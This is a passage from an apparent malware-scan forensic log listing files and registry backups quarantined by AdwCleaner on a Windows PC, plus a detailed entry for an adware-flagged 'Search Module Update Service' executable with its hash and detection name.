          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hayzumflex.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Hotlight.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Jaystock.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\md.xml
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Ranzumstring.exe.config
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Singlestock.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\String-Tax.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\TrioDex.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\Triszap.dll
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\uninstall.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\White-Fan.dat
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\WhiteDox.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ZamIng.bin
          0.4s C:\AdwCleaner\quarantine\files\minawnfwirmnfvkktxvpfljkezfbwjbc\ondemand\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Bluedax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Cofstock.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\conf.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Config.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Driphotity.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Duosolodax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Fasefax.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Hotjob.exe.config
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\HotSansoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ItTone.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Lexitone.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\md.xml
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Singlesoft.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Stockdax.dll
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tonin.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Tris-Ex.bin
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\uninstall.dat
          0.5s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Ventokix.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Viafix.exe.config
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Villa-Hold.exe.config
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.d.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.dat
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\Zaamla.exe
          0.6s C:\AdwCleaner\quarantine\files\uypvwyfwiqlwzlgcaetamsiwrpsvzjbq\ondemand\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.HP
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\ff.NT
          0.6s C:\AdwCleaner\quarantine\files\yflfhzqpbpikflkejzzzmwhtzekagshh\snp.sc
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe
          0.7s C:\AdwCleaner\quarantine\files\fbhcntlqzyoguexlgmesxwdbrjtmqwzd\uninstaller.exe.config
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\MIO.exe
          0.7s C:\AdwCleaner\quarantine\files\ielbdbrbvweizniejjkegaonighxrfrb\loader\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\
          0.8s C:\AdwCleaner\quarantine\files\nyudvkpyrukdybolltvxchflegktvram\QQLive\FailRecord.dat
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\prefs.js
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\profiles.ini
          0.9s C:\AdwCleaner\quarantine\files\togtlznllkvxztobrgnmuzjlcxqmmboy\Profiles\8rnx3iua.default\search.json.mozlz4
          0.9s C:\AdwCleaner\quarantine\files\vmyvkvouddwsanzcpfxrsjstzoesyukt\
          1.0s C:\AdwCleaner\quarantine\files\tkciylhxjmjrsbkzilrsksghwrxdouwq.back
          1.0s C:\AdwCleaner\quarantine\files\tzkoudrhqdrxzafwrmattbrwocwqewox.back
          1.0s C:\AdwCleaner\quarantine\files\nshnbphtlfdcaukurihucucbktvgrfuo.back
          1.1s C:\AdwCleaner\quarantine\files\lmegeqgwylgczmaugdncsoezrlfzdoow.back
          1.1s C:\AdwCleaner\quarantine\files\jidemsxupjpciijhzmqsoapuszhucfag.back
          1.1s C:\AdwCleaner\quarantine\files\hovlhcazljxzijuasrytdrtppuewtjam.back
          1.2s C:\AdwCleaner\quarantine\files\haajwoohpxztstxrtlhafsitfachjfmo.back
          1.2s C:\AdwCleaner\quarantine\files\apahvfitktjkzxvophzxcnioqbzksoqp.back
          1.2s C:\AdwCleaner\quarantine\files\fcvkhhaoafpnxinpxgtocpatvxdtiqvt.back
          1.2s C:\AdwCleaner\quarantine\files\evdtaqdoxakozjrppozslhkcjflrsund.back
          1.2s C:\AdwCleaner\quarantine\files\lrqkzkhhahecbbcndzqmcwucjlkucmif.back
          1.3s C:\AdwCleaner\quarantine\files\qekectrwctgkojzdhesvpgxwktxrjwbn.back
          1.3s C:\AdwCleaner\quarantine\files\xdheuyqjkchvboalodcocshwqpwapmas.back
          1.3s C:\AdwCleaner\quarantine\files\mkbhzixtozltywkkpgaztynbkuphdtdb.back
          1.3s C:\AdwCleaner\quarantine\files\pvosypxagsihssgnjyfyxcwezatewwum.back
          1.4s C:\AdwCleaner\quarantine\files\lqpsdbkmnkknxibvwwrsonrtakjijpzu.back
          1.4s C:\AdwCleaner\quarantine\files\smzcjlbrmvtqhfjhyginjshoqyjufruc.back
          1.4s C:\AdwCleaner\quarantine\files\damxwnvkbnzxtjfflsokifcgmotwrhpw.back
          1.4s C:\AdwCleaner\quarantine\files\virksncfeyszdlxcyurmcuhplcofsgcf.back
          1.5s C:\AdwCleaner\quarantine\files\glmtsyrtzckgrfjmnvaqymozloxekiil.back
          1.5s C:\AdwCleaner\quarantine\files\rzdkuelrbnuivrifmnklgfxvzzfrvetc.back
          1.5s C:\AdwCleaner\quarantine\files\uqtgfxjilungjdiyzwpzlmnwefohuhgy.back
          1.5s C:\AdwCleaner\quarantine\files\idflognkmdzjcvmbaecywvfxzubejjvu.back
          1.6s C:\AdwCleaner\quarantine\files\lqcgezgrlidhgtrhvxcomfelfgvdmvyt.back
          1.8s C:\AdwCleaner\quarantine\registry\reg_puhxbxsquvaobuhyfxejnebggtrfpdeq.reg
          1.9s C:\AdwCleaner\quarantine\registry\reg_tmimdswbkadtxhvqgdhuqpvbglcbmfdu.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_jdlnivjcusbkbrzcygoyhzspwyxlyggf.reg
          2.0s C:\AdwCleaner\quarantine\registry\reg_tfhkhetuluciyaeqriuqioeuyoypyxsy.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_elkwfsgmzobfidhvzhqpengxndnbnqrs.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_okibrbkxfqdrpthgjuptyhhyzfabxmei.reg
          2.1s C:\AdwCleaner\quarantine\registry\reg_wubsvososrzoldxnlntxwvkilyudnzeu.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_ldpgxoqehdbkeznqasdwthjtqljlfwbl.reg
          2.2s C:\AdwCleaner\quarantine\registry\reg_hoouldollkztgqhqkqlgbdtkjmjzbndm.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_tkndfadidnoselgvemeyjwzivzkdbfsi.reg
          2.3s C:\AdwCleaner\quarantine\registry\reg_dsvfxsmbfjqlgrtincrhckelkjmocsol.reg
          2.9s C:\AdwCleaner\quarantine\registry\reg_seqodqpqwkrfpncsawgyzpxawzputenw.reg
          3.0s C:\AdwCleaner\quarantine\registry\reg_icpltxjlklnkocbqgtzcggknkvebnjvv.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_gmmujjdiivebrljiqcjqctecrzmlbyoe.reg
          3.1s C:\AdwCleaner\quarantine\registry\reg_marasmtdffiyjsmfqktvvuzjrivxsool.reg
          3.3s C:\AdwCleaner\quarantine\registry\reg_cmqgxeamdfpuzwtxoepvczvloonypdwp.reg
          3.4s C:\AdwCleaner\quarantine\registry\reg_lyunspfrbhzgbwusmxmwbspblyhrulwy.reg
          3.5s C:\AdwCleaner\quarantine\registry\reg_lwqsugvxxjtyhoqpxtxtnpeygapjoxhm.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_pyvlcgypjrojemqatqyyrbrphjoxkdab.reg
          3.6s C:\AdwCleaner\quarantine\registry\reg_nhlqlirecitexubpkgzdofmsimewbpcz.reg
          3.7s C:\AdwCleaner\quarantine\registry\reg_xghjlxwlgaktwtkvamwqizmfzfhbckpp.reg
          3.8s C:\AdwCleaner\quarantine\registry\reg_zxsarcdkskpcuvedhjhhddlsqbgzdvzl.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_fxqtuaqoisrzsghbjocryzmwbqxxrjmj.reg
          3.9s C:\AdwCleaner\quarantine\registry\reg_ghlbbvjeqsokgnupaxajeyvokkfwkbnh.reg
          4.3s C:\AdwCleaner\quarantine\registry\reg_unkuocqomdygzgpxiizglrioehoicjtw.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ecyvuvgkunhnpfrrpafwfcsnhgaoljbe.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_ekwhxwvhltpkcpkavxnduhlgzgslyema.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_eggguycnntdekswyvzoyybdcedlmfkjm.reg
          4.4s C:\AdwCleaner\quarantine\registry\reg_rcexoyuquzinpyavyncsanjofviavxjk.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_lpbfohsuttixwzckzjvtadqmofpumzjy.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_ydwyyidsknzaljhhqvwxrjwcxayioedb.reg
          4.5s C:\AdwCleaner\quarantine\registry\reg_pjqrynmploqoznlaxrdefubadvvlkzmm.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_daspbjyasdxdvwwwggsvvhrmzgxpnshh.reg
          4.6s C:\AdwCleaner\quarantine\registry\reg_cuetcglxejoqlxnssrmciebndydxhdrt.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_xurnwhaxeqtdzlbnzpjbokafxnxsiqum.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_tkqingwmwszmeptvclzuroubstvcckhw.reg
          4.7s C:\AdwCleaner\quarantine\registry\reg_mcoutunprxdphivyuvmoatwdyuxhyzwb.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_tgfeavmdtxngkczofnkyzphiqdfwhsfl.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_mhdzapqmugdydwjjqicquolddejvwqup.reg
          4.8s C:\AdwCleaner\quarantine\registry\reg_gzmkcboyfqzjhwapfhvqeofjaefhcttm.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_vazsqhuudufaewoypbfbikwgzqcgqfkc.reg
          4.9s C:\AdwCleaner\quarantine\registry\reg_lwugahqruqrqqjgikiohovxoculwwysx.reg
          5.0s C:\AdwCleaner\quarantine\registry\reg_xeczysjuynsfncsdctquwwgkbnofarzi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_iioxwxczjbugugmwqmnueuszmpfqonbi.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_vrtdutftxfxohlxvramxkkrsqrnaioij.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_yvmqqvbcuamwvndvtdhefjuqlupmqiha.reg
          5.6s C:\AdwCleaner\quarantine\registry\reg_lwsnkfiuxbhfwjtitvqqzgtpowncmeix.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_fqcstvuljsuvdliaqoxcapwdameertol.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_ejsdpauzkeqyotivjhaivmsazspfnnay.reg
          5.7s C:\AdwCleaner\quarantine\registry\reg_yrdzjxchjfseqziayavxdwxeptdtlkom.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_peqwhjahmytfugksxniwczmpsseymesr.reg
          5.8s C:\AdwCleaner\quarantine\registry\reg_kiusmmvbvgzfcybhqmdrtdwqslscapcd.reg
          5.9s C:\AdwCleaner\quarantine\registry\reg_dtrxafqawoycuacbklvwcnjucjtvfqrq.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_mpldfxlkqddfqxemmzqxdxycwdwdxush.reg
          6.0s C:\AdwCleaner\quarantine\registry\reg_fiqaqrowoznmrtaduhmmjmdxvzunfivg.reg
          6.1s C:\AdwCleaner\quarantine\registry\reg_mmnettjvbtwenjqfrqilocfnkutzspil.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_diurulmulfktzboavnxvdildottqhhjx.reg
          6.2s C:\AdwCleaner\quarantine\registry\reg_xrqifbvohcnregydcpounrtfyrmjgmni.reg
          6.3s C:\AdwCleaner\quarantine\registry\reg_sjcuxpukaattukjmzpshxzvediwsgupz.reg
          7.0s C:\Windows\Prefetch\WUDFHOST.EXE-AFFEF87C.pf
          7.4s C:\Windows\System32\winevt\Logs\Microsoft-Windows-Winsock-WS2HELP%4Operational.evtx
          7.9s C:\Windows\Prefetch\NVDISPLAY.CONTAINER.EXE-98FFF787.pf
          8.1s C:\Windows\Prefetch\NVTELEMETRYCONTAINER.EXE-80BD8541.pf
         12.0s C:\Windows\Prefetch\SPOOLSV.EXE-D1F6B8B6.pf

   C:\AdwCleaner\quarantine\files\dbnpldzkbcknywexpmuzasbqpqchichu\GNUpdate\smu.exe
      Size . . . . . . . : 3.110.400 bytes
      Age  . . . . . . . : 0.1 days (2017-02-13 20:38:15)
      Entropy  . . . . . : 6.2
      SHA-256  . . . . . : 299A261F8F80A724845E489C67480EE006CA7859506C669CFB086010626C0462
      Product  . . . . . : W
      Publisher  . . . . : Search Module Ltd.
      Description  . . . : Search Module Update Service
      Version  . . . . . : 2.6.8.5785
      Copyright  . . . . : Copyright (C) 2014
      LanguageID . . . . : 1033
    > Kaspersky  . . . . : not-a-virus:HEUR:Monitor.Win64.SSPro.gen
      Fuzzy  . . . . . . : 102.0
      Forensic Cluster
         -1.9s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D19933300.log
         -1.8s C:\ProgramData\NVIDIA\MessageBus_4656_0x24D18F34700.log
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\LICENSE.txt
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\openweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\SnareWindowsInstallSupport.dll
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\stopweb.bat
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\s_32.ico
         -1.5s C:\AdwCleaner\quarantine\files\wjokuiyohnznyixipmcxmtjugrnejtpo\WinSnare.dll
         -1.4s C:\AdwCleaner\quarantine\files\mvmfgnrbrmdbsjisivmhfrvdpvtlbouw\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\
         -1.3s C:\AdwCleaner\quarantine\files\fpfqjlppnsdxcoxxfuaeemqptrzrgvpn\BITB16.tmp
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\
         -1.3s C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_Microsoft.Micros_2d44ca29ef1bb45be9e81bd7c7de23bb1bff79c7_e127e73b_1c458c2c\Report.wer
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\
         -1.3s C:\AdwCleaner\quarantine\files\wlhkcwthzxcfadlnsnitwidocovyfcvy\BITB27.tmp
         -1.2s C:\AdwCleaner\quarantine\files\lvghxrkdvjdmjauuvlqiouualgvwchnk\
         -1.2s C:\AdwCleaner\quarantine\files\atsifbjehqqalokjotexydyeaawktlln\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\cookies-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Web Data-journal
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\001180cbc33c583f_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\02cdb733b079655d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\08bc571418449ead_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\092f95ee9c1fc61c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ad89b7fc5facf78_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0e02ff08b4002e57_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed73590870cfbd2_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ed7399215f555d7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0ef5b10d79d9f0cb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\0fc3db66b9cbe75d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1b72c2d37a2af109_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1dff67c9badf383d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1e20774a42d716f3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\1f2ec90a78c46fdf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2009bcf78a35d470_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\20ba89671f087fc1_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\234986793e71f265_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\26968e7a0c71776d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2819c5233c1f77b4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2ac381ccd53e2ce0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\2b11e2e523e5d524_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3082972055161e5d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\3a977894dc0fcd39_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\442182c02ee0a243_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5125b9f58b582f46_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\593d0e1547012291_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\5ede7465ad814101_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66928cc3398bdbc9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\66e510668b4796e9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\6e2284174f43f7b0_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\711f9f610e35a8b6_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7150bac3e922a373_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7589f80f2ddeab29_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\775e37b82f99c13c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7acdc9382bf6b139_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7d8cebaadfd53fbf_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\7ecc93dfade6cf4e_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8326a92c0f293bc4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\83a226c1379f7a18_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\86850034110cf1c4_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8d9b27c428a8f6a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\8f60e69a4afd6f60_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\95ff98c7e9c1b8a3_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a1f309cd5a3eb6fa_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2719229322771c8_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\a2e6c4ddc62e67a7_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b07d05bc07d9c08b_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3986aa6d1a5b1ca_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b3edef432256edd5_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\b48454e7eeb33014_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ba7c73f14dafe451_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bd48447363dfb226_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\be189d201694bf89_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\bfbe9938bbb38577_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c0676a458818319d_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c3329b5e71fb9773_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c487316b1c7eb401_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c8bff37e9d993e8c_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c94b3024dfacfceb_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\c9efb04ec241100a_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd31a5585d55d245_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cd87b6402756547b_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cda276472aafd1d9_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\cdd7d0e76bb75c18_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\ce8699f098de9a28_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d19a15ac54bfa3ba_0
         -0.9s C:\AdwCleaner\quarantine\files\ezizrbrfsvrauqoombhivbqhmxdnjjpn\Cache\d652598e0bff0a74_0
